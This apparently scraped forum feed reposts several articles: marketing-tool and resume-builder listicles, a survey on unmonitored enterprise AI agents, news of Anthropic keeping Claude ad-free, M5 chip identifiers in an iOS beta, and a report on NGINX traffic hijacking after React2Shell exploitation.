Key Features:
Drag-and-drop campaign builder SMS, email, and push notifications Abandoned cart workflows Multi-channel automation
Pros: Ideal for e-commerce automation Affordable plans with scalable features
Cons: SMS costs can escalate Fewer integrations vs enterprise tools Official Website: Omnisend
2. Salesforce Marketing Cloud
Short Description: Powerful enterprise-grade marketing automation & analytics.
Key Features:
Email automation and segmentation Journey mapping AI-driven personalization Cross-channel campaign orchestration Deep analytics & reporting
Pros: Highly scalable and robust for enterprises Rich automation and personalization capabilities
Cons: Expensive; complex setup May require dedicated technical resources 3. Adobe Experience Cloud
Short Description: Integrated suite for analytics, advertising, content, and journey orchestration.
Key Features:
Web analytics Advertising & media optimization Content and experience management Targeting and journey orchestration
Pros: Comprehensive set of tools under one roof Strong for personalized customer experiences
Cons: High cost; best suited for large enterprises Complexity requires training or support 4. Bloomreach
Short Description: AI-powered marketing automation, product discovery, and headless CMS.
Key Features:
Email & SMS marketing automation (Engagement) AI-based product discovery and recommendations (Discovery) Headless content management (Content)
Pros: AI-driven personalization across channels Especially strong for e-commerce use cases
Cons: Less widespread adoption than others Enterprise-level pricing 5. Omneky
Short Description: AI tool that generates and optimizes ad creatives across channels.
Key Features:
AI-driven creative generation Multi-channel campaign launching Performance insights and optimization
Pros: Automates creative testing at scale Saves time for ad production
Cons: Focused on creative; limited broader marketing features Can lack human touch in art direction 6. Mailchimp
Short Description: Beginner-friendly email marketing with basic CRM integration.
Key Features:
Campaign automation Audience segmentation Basic CRM tools Built-in templates and analytics
Pros: Free plan available; easy to use Extensive integrations
Cons: Limited for advanced marketers Segmentation options are basic only 7. HubSpot Marketing Hub
Short Description: All-in-one marketing, sales, and CRM platform—ideal for growing businesses.
Key Features:
Email marketing & automation Blogging and content management SEO tools and landing pages CRM integration and live chat Custom dashboards & analytics Chatbots & lead tracking
Pros: Comprehensive suite; strong automation Scalable pricing tiers, including free
Cons: Advanced features locked behind higher-tier plans Learning curve for new users due to breadth of tools 8. Ahrefs
Short Description: Robust SEO toolkit for keyword research and link analysis.
Key Features:
Backlink analysis Keyword tracking Site audits and competitive research
Pros: Highly accurate data; trusted in SEO community Comprehensive features for organic search optimization
Cons: Costly for individuals or small teams Lacks email, CRM, or automation features 9. Google Ads (with Analytics & Search Console)
Short Description: PPC and SEO tools for visibility and performance tracking.
Key Features:
Targeted ad campaigns (Search, Display, Shopping) Keyword optimization and budget control Integration with Google Analytics and Search Console
Pros: High-intent traffic and reach Powerful targeting and budget control
Cons: Competitive and potentially expensive CPC Steep learning curve for optimization 10. AI & Content Workflow Stack (Surfer SEO + ChatGPT + Notion)
Short Description: An integrated workflow for content creation, optimization, and planning.
Key Features:
Surfer SEO: real-time content optimization ChatGPT: idea generation and copywriting Notion: collaborative planning and documentation
Pros: Efficient, modern content workflow Collaborative and scalable across teams
Cons: Requires manual integration Results depend on prompt quality Comparison Table
Tool NameBest ForPlatform(s) SupportedStandout FeaturePricingRating (G2/Capterra)OmnisendGrowing businesses & inbound marketingWeb-basedAll-in-one marketing + CRMFree / Custom tiersHigh (popular)Salesforce Marketing CloudEnterprises with complex needsWeb-basedJourney mapping & AI personalizationCustomHighAdobe Experience CloudEnterprises needing full-suiteWeb-basedContent + journey orchestrationCustomHighBloomreachE-commerce personalizationWeb-basedAI for discovery & content mgmtCustomStrongOmnekyCreative ad automationWeb-basedAI creative generationCustomNicheMailchimpSmall teams & email marketingWeb-basedEase of use + free tierFree / PaidHighHubSpot Marketing HubE-commerce marketing campaignsWeb-basedMulti-channel automationPaidSolidAhrefsSEO professionalsWeb-basedBacklink & keyword insightsPaidTop-ratedGoogle Ads + AnalyticsPaid search marketingWeb-basedPPC targeting + search optimizationPay-per-useIndustry standardSurfer SEO + ChatGPT + NotionContent marketing workflowsWeb-basedAI-enhanced content creation workflowMixedGrowing buzz Which Digital Marketing Platforms Tool Is Right for You?
Startups / Small Businesses: Mailchimp or HubSpot Free / Starter provide accessible entry points with easy onboarding. E-commerce Stores: Omnisend is great for multi-channel automations. Bloomreach offers stronger personalization as you scale. SEO-focused Teams: Ahrefs excels in backlink insights. Combine with Google Ads for paid search performance. Large Enterprises: Salesforce Marketing Cloud and Adobe Experience Cloud offer full-scale automation—though complexity and cost are higher. Content Creators & Agencies: Use the Surfer SEO + ChatGPT + Notion stack for streamlined ideation to publishing workflows. Creative-Heavy Campaigns: Omneky can be a powerful addition for automated ad creative testing and scaling. Conclusion
In 2026’s dynamic marketing environment, selecting the right digital marketing platforms tools is essential to streamline workflows, enable personalized interactions, and harness AI-powered automation. From beginner-friendly options like Mailchimp to enterprise-grade suites like Salesforce or Adobe, there’s a solution for every scale. The landscape continues evolving—so test free plans or request demos to ensure your choice aligns with your team’s workflow and goals.
FAQs
Q1: What’s the difference between marketing platforms and tools?
Marketing platforms, like HubSpot or Salesforce, are integrated suites covering multiple marketing functions; tools, like Ahrefs or Mailchimp, often focus on specific needs (SEO, email).
Q2: Are free tiers enough to get started?
Absolutely! Tools like HubSpot (Free), Mailchimp, and Google Analytics offer substantial capabilities to begin with, though advanced features may require paid plans.
Q3: How important is AI in marketing tools now?
AI is rapidly becoming essential—used for personalization, creative generation, optimization, and analytics. Platforms like Salesforce, Adobe, and Omneky are leading with AI integrations.
Q4: Can I mix multiple tools instead of choosing a platform?
Yes! Many businesses combine best-of-breed tools (e.g., Ahrefs + Surfer + Notion) for flexibility—but this requires smooth integration and management.
Q5: How do I choose the right tool without overspending?
Start with a list of must-have features, test free trials, compare pricing tiers, and prioritize tools that integrate easily with your existing stack.
View the full article
- 0 comments
- 56 views
-
AI Email Marketing Tools have revolutionized the way businesses engage with their customers. In 2025, these tools are more important than ever, allowing marketers to optimize email campaigns, personalize content, and automate tedious tasks while maximizing ROI. By leveraging machine learning and data analytics, AI email marketing tools can craft highly personalized messages, segment audiences, and predict user behavior, all of which are essential in a competitive digital landscape.
When choosing an AI Email Marketing Tool, businesses should look for features such as ease of integration with other marketing platforms, automation capabilities, analytics, personalization, and scalability. Whether you are a small business or a large enterprise, selecting the right tool depends on your specific needs, budget, and marketing objectives.
Top 10 AI Email Marketing Tools in 2025
1. Omnisend
Short Description:
Omnisend specializes in omnichannel marketing, offering AI-driven email campaigns that integrate SMS and push notifications for a more unified customer experience.
Key Features:
Omnichannel integration: Combine email, SMS, and push notifications. AI-powered workflows: Create personalized campaigns based on customer actions. Product recommendations: Automatically suggest products based on browsing history. Advanced segmentation: Use AI to segment your audience more effectively. Detailed reporting: Track performance across multiple channels. Pros:
Great for eCommerce businesses. Strong omnichannel capabilities. User-friendly interface. Cons:
Limited customization options for email templates. Some features are only available on higher-tier plans. Official Website: Omnisend
2. ActiveCampaign
Short Description:
ActiveCampaign is a customer experience automation platform that combines email marketing, automation, sales, and CRM into one. It uses AI to improve customer engagement and streamline marketing efforts.
Key Features:
Automated workflows: Build advanced automation flows based on user behavior. AI-powered segmentation: Automatically segment your audience for targeted messaging. Predictive sending: AI helps decide the best time to send emails. CRM integration: Built-in CRM to manage contacts and interactions. Customer data insights: Deep analytics for better campaign results. Pros:
Strong integration capabilities with eCommerce and CRM tools. Excellent customer support and onboarding process. Cons:
Can be complex for beginners. Slightly higher pricing for advanced features. Official Website: ActiveCampaign
3. SendGrid
Short Description:
SendGrid is an email marketing platform known for its strong email deliverability. It uses AI to enhance email performance and is designed for developers, marketers, and businesses of all sizes.
Key Features:
AI-powered analytics: Provides data-driven insights to optimize email performance. Advanced segmentation: AI-driven audience segmentation for tailored messages. Automation workflows: Create automatic email sequences based on customer behavior. Deliverability optimization: AI tools to ensure your emails reach the inbox. Scalable email sending: Great for both small campaigns and large-scale operations. Pros:
Excellent deliverability rates. Flexible pricing options, including a free tier. Great API for developers. Cons:
Lacks some advanced design features compared to competitors. Learning curve for beginners. Official Website: SendGrid
4. GetResponse
Short Description:
GetResponse is an AI-powered email marketing platform that offers automation, CRM, and landing page building. It’s particularly useful for businesses looking to create comprehensive email campaigns.
Key Features:
Email automation: Create sophisticated email workflows. Advanced AI segmentation: Target the right people with the right message. Landing page builder: Build optimized landing pages for conversions. Webinar hosting: Integrate webinars with email campaigns. In-depth analytics: AI-driven reporting to enhance performance. Pros:
Comprehensive suite with email, CRM, and webinars. Strong customer support and knowledge base. Cons:
Limited integrations compared to other platforms. Some features may require an additional cost. Official Website: GetResponse
5. ConvertKit
Short Description:
ConvertKit is a popular choice for content creators and small businesses. It uses AI to personalize email campaigns based on audience behavior and engagement.
Key Features:
Easy automation: Set up email sequences with minimal effort. AI-driven personalization: Deliver personalized content based on user preferences. Landing pages and forms: Easily create high-converting landing pages. Segmentation and tagging: Organize your audience for more precise targeting. Reports and analytics: Gain insights to improve future campaigns. Pros:
Great for creators and small businesses. Simple and clean interface. Excellent automation tools. Cons:
Limited advanced features for larger businesses. Lacks some eCommerce functionalities. Official Website: ConvertKit
6. Moosend
Short Description:
Moosend is an AI-powered email marketing platform designed for eCommerce businesses. It offers sophisticated automation and analytics tools to help marketers improve engagement.
Key Features:
AI-powered recommendations: Suggests email content based on user behavior. Smart segmentation: Automatically segments contacts based on interests and activity. Advanced A/B testing: Test and optimize emails for better performance. Behavioral triggers: Send emails triggered by user actions on your website. Real-time reporting: Monitor campaign performance with real-time metrics. Pros:
Affordable pricing plans. Great for eCommerce businesses. Easy-to-use interface. Cons:
Limited integrations with other software. Basic design features compared to others. Official Website: Moosend
7. Klaviyo
Short Description:
Klaviyo is an advanced AI email marketing platform built for eCommerce businesses. It integrates seamlessly with platforms like Shopify, BigCommerce, and others to deliver personalized and automated email campaigns.
Key Features:
AI-powered segmentation: Segment customers based on behaviors and actions. Predictive analytics: Use AI to predict customer lifetime value and engagement. Personalized recommendations: Send tailored product suggestions. Automation workflows: Automate email sequences based on customer actions. Advanced reporting: Monitor campaigns with in-depth analytics. Pros:
Excellent for eCommerce businesses. Deep integrations with popular eCommerce platforms. Powerful AI tools for segmentation. Cons:
Can be expensive for small businesses. Steeper learning curve for new users. Official Website: Klaviyo
8. Benchmark Email
Short Description:
Benchmark Email offers a user-friendly interface with AI-powered features that help businesses craft personalized email campaigns with ease.
Key Features:
AI-powered segmentation: Segment your audience for personalized emails. Customizable templates: Use AI to recommend the best templates. Email automation: Automate your email marketing based on customer behavior. Campaign analytics: Measure and improve your campaigns with AI-driven insights. Simple drag-and-drop editor: Easily design professional emails. Pros:
Easy-to-use for beginners. Affordable pricing plans. Great customer support. Cons:
Limited advanced features. Basic integrations compared to competitors. Official Website: Benchmark Email
9. Drip
Short Description:
Drip is an AI-driven email marketing automation tool designed for eCommerce businesses, offering advanced features to help businesses scale their marketing efforts.
Key Features:
Smart segmentation: Use AI to segment customers based on their behavior. Email personalization: Automatically personalize content for each subscriber. Advanced automation: Build automated workflows that trigger based on customer actions. Multi-channel marketing: Integrate email, SMS, and other marketing channels. Detailed analytics: Track campaign success with in-depth reporting. Pros:
Powerful automation tools for eCommerce. Great for building personalized email flows. Excellent customer support. Cons:
Pricing can be high for small businesses. May have a steeper learning curve. Official Website: Drip
Comparison Table
Tool NameBest ForPlatform(s) SupportedStandout FeaturePricingRatingOmnisendSmall to medium businessesWeb, iOS, AndroidAI-powered personalizationFree / Starts at $9.994.5/5ActiveCampaignBusinesses of all sizesWeb, iOS, AndroidAutomated workflowsStarts at $9 / month4.7/5SendGridDevelopers and marketersWeb, iOSDeliverability optimizationFree / Custom4.3/5GetResponseeCommerce & marketersWeb, iOSLanding page builderStarts at $15/month4.6/5ConvertKitContent creatorsWeb, iOSEasy automationFree / Starts at $94.5/5MoosendeCommerce businessesWeb, iOSAI-powered recommendationsFree / Starts at $84.4/5KlaviyoeCommerceWeb, iOSPredictive analyticsCustom4.7/5Benchmark EmailSmall businessesWeb, iOS, AndroidAI-powered segmentationFree / Starts at $13.994.4/5DripeCommerceWeb, iOSMulti-channel marketingStarts at $19/month4.5/5 Which AI Email Marketing Tools Tool is Right for You?
Decision-Making Guide:
Small businesses or startups: Tools like Mailchimp or Benchmark Email offer great value for money and simplicity in design and automation. Ecommerce businesses: Platforms like Omnisend, Klaviyo, or Drip provide advanced AI-driven segmentation and integration with eCommerce platforms. Content creators: ConvertKit is perfect for creators looking to automate email marketing with simplicity and efficiency. Enterprise businesses: ActiveCampaign provides extensive integrations, workflow automation, and advanced analytics. Conclusion
As AI continues to transform the way businesses approach marketing, AI Email Marketing Tools in 2025 are essential for staying competitive. By selecting the right tool, you can optimize your email campaigns, increase customer engagement, and drive sales. We recommend taking advantage of free trials or demos to explore the features of these tools and determine the best fit for your needs.
FAQs:
What are AI email marketing tools? AI email marketing tools use machine learning and data analytics to automate and personalize email campaigns, helping businesses engage with their audience more effectively. Which AI email marketing tool is best for eCommerce? Klaviyo and Omnisend are excellent choices for eCommerce businesses due to their advanced AI-powered segmentation and integration capabilities. Are AI email marketing tools expensive? While some AI tools offer free plans, advanced features often come with a price. Pricing varies by tool, starting from free to premium tiers. Can AI email marketing tools help with segmentation? Yes, AI email marketing tools use machine learning to analyze customer behavior and segment audiences for more targeted campaigns. How do AI email marketing tools improve engagement? AI tools enhance engagement by sending personalized content at the right time and tailoring messages based on user behavior and preferences. View the full article
- 0 comments
- 39 views
-
Based on a December 2025 survey of 750 IT executives and practitioners conducted by Opinion Matters, the results revealed that AI agents are being deployed faster than security teams can keep up. There are, said Rory Blundell, CEO of Gravitee, now over three million AI agents operating within corporations, which he described as a workforce larger than the entire global employee count at Walmart.
The three million number is based on an extrapolation of survey results, based on government estimates of 8,250 UK businesses and 77,000 US businesses that employ 250 employees or more. The mean number of AI agents deployed per business is 36.9, and when respondents were asked if their organization “experienced or suspected an AI agent-related security or data privacy incident in the past 12 months,” 88% said that they had.
The mean percentage of agents that are not actively monitored and secured, according to the findings, was 53%
Asked what prompted the study, Blundell wrote in an email, “we’re all familiar with stories of AI agents going rogue: deleting codebases, leaking confidential information, inventing fake data. The working hypothesis that prompted this research was that, while agentic deployment is reaching an exciting stage, businesses have not yet caught up with agent governance. The research validates that.”
A global problem
Agents, he said, “can offer businesses a huge productivity gain, but we have to be realistic about the risks: without governance and oversight, they can easily start becoming liabilities, and a danger to consumers and businesses alike.”
In addition, said Blundell, despite respondents being only from the UK and US, “this is absolutely a global problem. Companies around the world are using AI agents, and across the board there is a gap between the level of deployment and the level of governance. We have a strong customer base in the EU, where we see the same problems.”
David Shipley, head of Canadian-based security awareness training firm Beauceron Security, said, “the only thing that shocks me is that people think it’s only 53% of agents that aren’t monitored. It’s higher.”
He likened the results from the Gravitee study to a “lesson about the Titanic that everyone in technology keeps ignoring. The Titanic disaster didn’t happen because they didn’t know there would be icebergs on the trip. They knew it was peak iceberg season, they knew they were going too fast.”
Shipley said that the ship’s captain and his crew “thought they’d detect [an iceberg]; if they didn’t, and hit one, that their technology controls would protect them to help them recover.” They put their faith in the so-called watertight compartments that, it turned out, weren’t watertight at the top, but, most importantly, they trusted the new wireless communications technology that they could use to call for help if they got in trouble. The equivalent today: “Well, IT and security can fix it if we get in trouble with our agents.”
“Wrong then, super wrong now,” he said.
He said, “we know AI agents are inherently dangerous and unreliable. There’s literally math proofs out there that show it. So, we know there are icebergs. Let me repeat this for those at the back of the room: 100% of AI agents have the potential to go rogue. If a vendor assures you it isn’t possible and their core technology is an LLM, they’re lying. We know we’re going too fast in adoption for the risks we know exist.”
Shipley added, “now, the funny part: imagine if the Titanic still made the choices it did, knowing the watertight compartments didn’t work (aka monitoring is missing for 53% of AI agents), we know by the time IT and security roll on an AI agent risk, the damage is done (the ship’s sinking too fast and radio isn’t going to help because help will be too late). And we still made the choices we’re making.”
The real issue is invisible AI, not rogue AI
Manish Jain, principal research director at Info-Tech Research Group, said that as the “exponential” speed of AI development continues, his firm, based on experiences with CIOs and CDOs, predicts that there will be more AI agents globally by the year 2028 than the number of human employees. “It would be one of the biggest challenges for business and IT executives to govern them without curtailing the innovation that these AI agents bring with them,” he said.
Even today, he noted, “we see that most enterprise AI agents are running without oversight. Many organizations don’t even know how many agents they have, where they’re running, or what they can touch. If you don’t know how many mules are in the barn, don’t act surprised when one kicks the door down.”
Jain pointed out that AI agents are no different. “Unaccounted agents often emerge through sanctioned, low-code tools and informal experimentation, bypassing traditional IT scrutiny until something breaks. You cannot govern what you can’t see. So, we need to understand that the real issue isn’t ‘rogue AI’, it’s invisible AI.”
Info-Tech, he added, “strongly believes that governing AI models or pre-approving agents is no longer enough, because invisible, rogue agents will do tandava (the dance of destruction) at runtime. This is because, when it comes to governing these AI agents, the number is so huge that approval gates will not be sustainable without halting the innovation. Continuous oversight should be the priority for AI governance after setting initial guardrails as part of the AI strategy.”
Perspective, he said, also needs to change: “AI agents are no longer helpful bots. They often operate with delegated yet broad credentials, persistent access, and undefined accountability. This can become a costly mistake as overprivileged agents are the new insider threat. We need to define tiered access for AI agents. While we can’t avoid giving a few people keys to our house to speed up things, if you trust every stranger with your house keys, we wouldn’t be able to blame the locksmith when things go missing.”
View the full article
- 0 comments
- 44 views
-
In today’s competitive job market, having a well-crafted resume is more important than ever. With hiring processes becoming increasingly automated, it’s essential for job seekers to stand out through a professional and polished resume. This is where AI resume builders come into play. AI-powered tools offer automation, efficiency, and customization to help users create impactful resumes without the hassle. These tools are designed to help users design resumes that meet industry standards, match job descriptions, and optimize the content for applicant tracking systems (ATS).
As we move into 2025, AI resume builders are evolving to offer smarter features that provide personalized insights, design recommendations, and keyword optimization. When choosing an AI resume builder tool, users should look for key features such as ease of use, integration with job boards, resume templates, customization options, and ATS compatibility.
In this article, we will explore the Top 10 AI Resume Builders Tools in 2025, compare their features, and help you find the best solution for your resume needs.
Top 10 AI Resume Builders Tools in 2025
1. ResumeCoach
ResumeCoach is an AI-powered resume and cover letter builder that helps you create (or improve) a job-ready resume in minutes using ATS-friendly templates, guided writing tips, and AI-generated phrases. It’s a solid option for job seekers who want a fast, structured way to produce professional documents.
Key Features:
Create a resume from a template or upload an existing resume to improve it with AI ATS-friendly templates with guided, section-by-section writing support AI-generated phrases and role-specific suggestions to strengthen bullet points and summaries Cover letter builder + AI cover letter generator to match your resume Download and sharing options (PDF/TXT downloads and share via a private link, depending on plan/features) Pros:
Beginner-friendly flow: templates + expert guidance make it easy to avoid common resume mistakes AI enhancements help quickly improve wording and add professional phrasing Free plan available to start building and test the workflow Cons:
Free plan is limited (e.g., TXT download on the free tier; advanced downloads/features typically require an upgrade) Some advanced features (stronger AI tools and full export options) are gated behind paid plans Official Website: ResumeCoach
2. Zety
Short Description:
Zety is an AI resume builder tool designed to simplify the resume creation process with customizable templates and expert-written tips. It’s perfect for job seekers who want to craft a professional resume quickly.
Key Features:
A wide variety of professionally designed templates Customizable sections for work experience, skills, and certifications Real-time content suggestions based on job titles Easy export options (PDF, DOCX, TXT) Integrated cover letter builder Pros:
Provides actionable tips and advice during the resume-building process Free resume templates available Advanced customization for premium users Cons:
Requires a paid subscription for full access to premium features Limited design options for free users
3. Novoresume
Short Description:
Novoresume is a resume builder that uses AI to create personalized resumes based on user input. It’s especially suited for job seekers looking to target specific industries, as it provides tailored resume templates for various career fields.
Key Features:
Industry-specific templates AI-driven suggestions for optimizing resume content Cover letter builder and CV generator Real-time feedback for improving content Mobile-friendly interface for easy access Pros:
Personalized industry-specific advice ATS-friendly templates Highly intuitive user interface Cons:
Free version limits access to templates and features Advanced features are behind a paywall
4. Resumake
Short Description:
Resumake is a simple, user-friendly AI-powered resume builder that allows users to create resumes quickly and efficiently. It is perfect for those who need a resume fast without a steep learning curve.
Key Features:
No sign-up required to use the tool Basic yet effective templates Easy-to-navigate interface Free to use with no hidden fees Simple download options (PDF format) Pros:
Completely free to use Minimalist interface that is easy to understand Ideal for quick resume building Cons:
Limited template variety Lack of advanced customization features
5. Kickresume
Short Description:
Kickresume is an AI-powered resume builder with a focus on creating highly personalized resumes that reflect individual branding. It’s ideal for professionals looking to stand out with unique design elements and a highly customized experience.
Key Features:
AI-driven content suggestions for every section of the resume Access to more than 30 templates Resume analysis and optimization for ATS Cover letter generator Design customizations to reflect personal branding Pros:
Offers strong design flexibility and customization Perfect for professionals in creative fields Multiple language support Cons:
Limited functionality in the free version Premium subscription required for full access to templates
6. VisualCV
Short Description:
VisualCV offers AI-powered resume building with a focus on creating visually appealing and content-rich resumes. It’s well-suited for professionals in creative and technical fields, allowing them to create standout resumes.
Key Features:
Highly customizable templates Visual resume options with data visualization Professional portfolio integration ATS-friendly formatting One-click export to PDF and other formats Pros:
Focuses on professional branding with customizable design elements Great for those in creative industries Provides in-depth analytics for resume performance Cons:
More expensive compared to some other tools Advanced features are only available in premium plans
7. ResumeBuilder
Short Description:
ResumeBuilder is an AI-powered tool that generates professional resumes with easy-to-use templates and guided content creation. It is ideal for users who need an effective resume without needing to spend too much time customizing.
Key Features:
Step-by-step resume creation wizard Customizable templates for various industries Free resume downloads in PDF format Built-in cover letter builder Professional tips and suggestions Pros:
Simplified user interface Excellent for entry-level job seekers Free option available Cons:
Limited templates in the free version Fewer advanced customization features
8. Jobscan
Short Description:
Jobscan focuses on helping users optimize their resumes to pass through applicant tracking systems (ATS). The tool’s AI analyzes job descriptions and tailors resumes to improve the chances of getting noticed by recruiters.
Key Features:
ATS-friendly resume scanning Tailored keyword recommendations Job description comparison tool Real-time feedback for optimizing resume content Integration with job boards Pros:
Excellent ATS optimization and keyword targeting Focuses on improving the job search process Provides insights on how your resume fares against job descriptions Cons:
Limited free features Requires a premium plan for full functionality
9. Enhancv
Short Description:
Enhancv’s AI resume builder helps job seekers craft customized and impactful resumes. It’s particularly useful for those seeking unique and visually engaging resumes that reflect their skills and accomplishments.
Key Features:
Customizable templates for creative resumes Visual resume design options Skills and achievement-based sections Real-time resume content suggestions One-click export to PDF or Word formats Pros:
Beautiful design options that allow for personalization Great for creative and tech professionals Easy-to-navigate platform Cons:
Free version offers limited templates Some templates are only available with paid plans
10. Resumelab
Short Description:
Resumelab is an easy-to-use AI resume builder that focuses on simplicity and fast results. It’s perfect for users who want a quick yet professional resume without unnecessary complications.
Key Features:
Step-by-step resume building process Multiple professional templates to choose from Fast resume generation and export options ATS-friendly formatting 24/7 customer support Pros:
Quick and straightforward resume creation User-friendly interface Free version available with basic features Cons:
Limited customization in the free version Premium features are necessary for advanced templates
Comparison Table
Tool NameBest ForPlatform(s) SupportedStandout FeaturePricingG2/Capterra RatingResumeCoachAll industriesWeb, iOS, AndroidATS-friendly templatesFree/Paid4.7/5ZetyProfessionals across sectorsWebCustomizable sections with tipsPaid4.6/5NovoresumeIndustry-specific resumesWebTailored industry templatesFree/Paid4.8/5ResumakeQuick resume creationWebSimple interface, no sign-up neededFree4.5/5KickresumeCreative professionalsWebCustom branding optionsPaid4.7/5VisualCVCreative & technical fieldsWebVisual data integrationFree/Paid4.5/5ResumeBuilderEntry-level job seekersWebEasy-to-follow wizardFree/Paid4.4/5JobscanATS optimizationWebJob description comparisonPaid4.9/5EnhancvCreative professionalsWebVisual designs and achievementsPaid4.6/5ResumelabFast, simple resumesWebFast resume generationFree/Paid4.3/5 Which AI Resume Builders Tool is Right for You?
When selecting the best AI resume builder, it’s important to consider your career stage, industry, and specific needs:
Entry-level job seekers may prefer ResumeBuilder or Resumake for their ease of use and free options. Creative professionals can benefit from tools like Enhancv or Kickresume for highly customizable designs. Industry-specific resumes are best with Novoresume, which tailors templates to various job sectors. Job seekers needing ATS optimization should consider Jobscan or Zety, which offer specialized features to get past hiring software. Conclusion
AI resume builders are an invaluable tool for job seekers looking to stand out in a competitive market. As we head into 2025, these tools are becoming more advanced, with better customization options, ATS optimization, and industry-specific templates. Whether you are crafting your first resume or updating your current one, these AI-powered tools can help streamline the process and improve your chances of landing an interview. We encourage you to try out demos or free trials to see which one works best for your needs.
View the full article
- 0 comments
- 43 views
-
According to Anthropic, including ads in Claude would not be in line with its mission of creating a helpful assistant for work and deep thinking. Anthropic claims that users should not need to second-guess whether an AI is being helpful or "subtly steering the conversation towards something monetizable."
There will be no ads or sponsored links in conversations with Claude, and Claude's responses will not be influenced by advertisers or include third-party product placements.
Promising an ad-free experience could encourage people to choose Claude over OpenAI's ChatGPT. In January, OpenAI said that it would start testing ads in the United States for free and Go tier subscribers, though subscribers with higher paid tiers will not see ads. OpenAI claims that ads will be clearly labeled and will not influence the answers that ChatGPT provides, nor will the company provide conversation details to advertisers.
To further reinforce the difference between Claude's ad-free experience and ChatGPT's ad-supported experience, Anthropic plans to run a humorous Super Bowl commercial where a man gets an unwanted cougar dating ad after asking about his mother. "Ads are coming to AI," reads the video's text. "But not to Claude."
Anthropic plans to continue to monetize through enterprise contracts and paid subscriptions, with revenue reinvested in improving Claude. Anthropic will maintain a free tier, and the company says that it may also offer lower-cost subscription tiers and regional pricing in the future if there is demand for it. Claude Pro is priced at $20 per month, which is the same price as ChatGPT's higher-end Plus tier.
An ad-free Claude experience isn't a sure thing forever, as Anthropic gives itself an out in the blog post: "Should we need to revisit this approach, we'll be transparent about our reasons for doing so."Tags: Anthropic, ChatGPT, OpenAI
This article, "Anthropic Promises Claude Will Remain Ad-Free, Mocks ChatGPT Ads in Super Bowl Commercial" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 37 views
-
The iOS 26.3 RC mentions two unreleased SoCs, T6051 and T6052, with associated H17C and H17D platform names. The 17 is a reference to the M5, as the standard M5 chip is numbered H17G. Typically, the "C" lettering is used with a Max chip, and the "D" lettering is used for Ultra chips. G is used for standard chips, and S is used for Pro chips.
When using Apple's past numbering and lettering as a reference, that would suggest an M5 Max and an M5 Ultra chip. There is no current reference to T6050 H17S, which is the chip identifier and platform name we'd expect for the M5 Pro.
Since we're currently waiting on new versions of the MacBook Pro with M5 Pro and M5 Max chips, the chip references located are a bit confusing. We have three possibilities: there's an M5 Pro chip along with an M5 Max and M5 Ultra chip and it's just not added to the iOS 26.3 code yet, Apple is changing its numbering, or Apple is planning for M5 Max and M5 Ultra MacBook Pro models.
Chip 1 in the beta: T6051, H17C. Presumably M5 Max.
Chip 2 in the beta: T6052, H17D. Presumably M5 Ultra.
Not in the beta: T6050, H17S. Chip identifier expected for M5 Pro.
Apple's past Max chips have all used "C" lettering, including the M1 Max (H13C), M2 Max (H14C), M3 Max (H15C/H15M), and M4 Max (H16C). There was also an M variant of the M3 Max for the 14-core chip, with Apple using C for the 16-core chip.
Ultra chips have all used "D" lettering, including the M1 Ultra (H13D), M2 Ultra (H14D), and M3 Ultra (H15D). There was no M4 Ultra chip.
It's not clear why we are only seeing signs of an M5 Max and M5 Ultra chip, but rumors suggest that new MacBook Pro models with higher-end M5 chips are set to launch in the next few weeks. Apple is supposedly working on a Mac Studio in the M5 family, which would use an M5 Ultra chip, but we haven't heard rumors about an upcoming launch.
This article, "New M5 Chips Spotted in iOS 26.3 Beta" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 33 views
-
That’s the conclusion of researchers at Datadog Security Labs, who said in a blog Wednesday that the primary targets are sites running the NGINX open-source web server managed with Boato Panel. These include Asian organizations with top level domains ending in .in, .id, .pe, .bd, .edu, .gov, and .th, as well as Chinese hosting infrastructure.
The danger, said blog author Ryan Simon, a senior security researcher at Datadog Security Labs, is that a hacker can use a compromised site to do a number of nasty things such as fingerprint an organization’s web traffic, insert malware onto users’ computers, or divert traffic to a threat actor-controlled landing page that tries to trick users into giving up login credentials.
These last two tactics also end up damaging a website’s reputation, Simon added, if the word gets around that the site hosts malware.
NGINX is a “foundational element of contemporary web infrastructure,” the Datadog blog notes. The routing and processing of traffic by NGINX is governed by its configuration files. Poor configuration or a successful breach allow it to be used for web traffic hijacking.
For CSOs, the defense against these attacks is to lock down those configuration files to resist their being tampered with.
React2Shell is the exploitation of a vulnerability (CVE-2025-55182) in the React 19 library for building application interfaces that was discovered late last year. The hole allows attackers to execute arbitrary code on affected servers.
Related content: Anatomy of React2Shell
Researchers at Greynoise said this week that exploitation activity targeting React Server Components has consolidated significantly. Two IP addresses now account for 56% of all observed exploitation attempts, down from 1,083 unique sources earlier.
Unpatched versions of React are at risk of compromise.
Initial abuse
“What we saw in a lot of our honeypots and threat intelligence early on with React2Shell is attackers were using it for cryptomining,” said Simon. Others have seen exploitation used to deploy reverse shells. But more recently, Simon said, Datadog Security is seeing threat actors, once in an IT network, going after web servers to highjack their traffic.
An analysis of the scripts used by threat actors on compromised NGINX web servers shows they use a multi-stage and automated approach to attacking the environments. The toolkits contain target discovery plus several scripts designed to establish persistence and for the creation of malicious configuration files containing instructions intended to redirect web traffic, says the Datadog blog.
There is no commonality among the targeted organizations, Simon noted.
Hijacking web traffic is an old tactic for threat actors. In fact David Shipley, head of Canadian security awareness training provider Beauceron Security, called these attacks on NGINX servers “a return to old-school hacking in the era of stronger identity controls like password managers, MFA and passkeys.”
“If you’re up against a more robustly defended user, you go back to attacking the infrastructure so you can go back into attacker-in-the-middle mode for some good old session cookie capture and other hijinks on the NGINX,” he said.
Finding and exploiting server side vulnerabilities or network security vulnerabilities is fast, cheap, and easy with AI, he added.
Simon said CSOs can help protect NGINX servers from being exploited by monitoring configuration file integrity, including keeping records of their server configurations so any changes can be spotted.
It’s vital that web servers have the latest security patches, he added. And admins should also monitor the NGINX security advisory website.
View the full article
- 0 comments
- 44 views
-
That’s the conclusion of researchers at Datadog Security Labs, who said in a blog Wednesday that the primary targets are sites running the NGINX open-source web server managed with Boato Panel. These include Asian organizations with top level domains ending in .in, .id, .pe, .bd, .edu, .gov, and .th, as well as Chinese hosting infrastructure.
The danger, said blog author Ryan Simon, a senior security researcher at Datadog Security Labs, is that a hacker can use a compromised site to do a number of nasty things such as fingerprint an organization’s web traffic, insert malware onto users’ computers, or divert traffic to a threat actor-controlled landing page that tries to trick users into giving up login credentials.
These last two tactics also end up damaging a website’s reputation, Simon added, if the word gets around that the site hosts malware.
